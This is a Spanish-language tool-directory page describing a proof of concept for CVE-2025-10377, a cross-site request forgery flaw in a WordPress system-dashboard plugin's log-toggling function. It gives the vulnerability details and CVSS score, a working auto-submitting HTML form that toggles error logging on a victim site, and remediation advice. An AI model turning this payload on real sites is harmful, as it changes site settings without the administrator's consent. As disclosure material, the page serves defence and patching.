Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-10377 — CVE-2025-10377 | Kitploit
Herramientas/GitHubGitHub/nagisayumaa/cve-2025-10377
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubnagisayumaa/cve-2025-10377

CVE-2025-10377

CVE-2025-10377

Ver Repositorio
hace 0 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Prueba de Concepto CVE-2025-10377 Cross-Site Request Forgery (CSRF) en el Panel del Sistema del Plugin (Función sd_toggle_logs)

Tipo de vulnerabilidad: Cross-Site Request Forgery (CSRF)

Función afectada: sd_toggle_logs()

CVSS v3.1: 4.3 (Media)
Vector: AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N
(Nota: La puntuación refleja un cambio de estado no autorizado que requiere una víctima administradora e interacción del usuario.)

Descripción de la vulnerabilidad:

La función sd_toggle_logs() procesa operaciones sensibles como habilitar/deshabilitar los registros de acceso a páginas, los registros de errores y los registros de entrega de correo electrónico. Sin embargo, depende únicamente del parámetro $_REQUEST['log_type'] y de una comprobación de capacidad (current_user_can( 'manage_options' )) sin implementar protección CSRF (p. ej., check_admin_referer() o un nonce).

Como resultado, un atacante puede engañar a un Administrador con sesión iniciada para que visite una página maliciosa que envía silenciosamente una solicitud manipulada, provocando cambios no deseados de habilitación/deshabilitación en el registro del sitio.

Impacto:

  • Cambios de estado no autorizados en las funciones de registro del sitio (Registro de acceso a páginas, Registro de errores, Registro de entrega de correo electrónico).

Descargar herramienta
  • Si el registro de errores está habilitado, el sitio puede comenzar a escribir errores de aplicación en una ruta de archivo determinada por el plugin (aumentando la probabilidad de divulgación de información operativa a través de los registros), pero el impacto directo de este problema es el cambio de estado en sí.

  • POC

    Cuando un Usuario con manage_options con sesión iniciada visita la página del atacante, la función de registro correspondiente se alterna sin consentimiento explícito.

    root@kitploit:~
     <body>
        <form action="http://victim.com/wordpress/wp-admin/admin-ajax.php">
          <input type="hidden" name="action" value="sd&#95;toggle&#95;logs" />
          <input type="hidden" name="log&#95;type" value="errors&#95;log" />
          <input type="hidden" name="fast&#95;ajax" value="true" />
          <input type="hidden" name="load&#95;plugins&#91;&#93;" value="system&#45;dashboard&#47;system&#45;dashboard&#46;php" />
          <input type="submit" value="Submit request" />
        </form>
        <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
        </script>
      </body>
    </html>
    

    Remediación

    • Implementar nonces de WordPress (check_admin_referer() o wp_verify_nonce()) para validar las solicitudes.

    • Restringir las acciones sensibles solo a solicitudes POST.

    • Evitar depender únicamente de las comprobaciones de capacidad como protección contra CSRF.

    Video POC

    Si no puede reproducir el problema exactamente como se describe en el informe, consulte la siguiente demostración en video (PoC) para ver un escenario de reproducción claro:

    https://youtu.be/WtWYIfEM4W0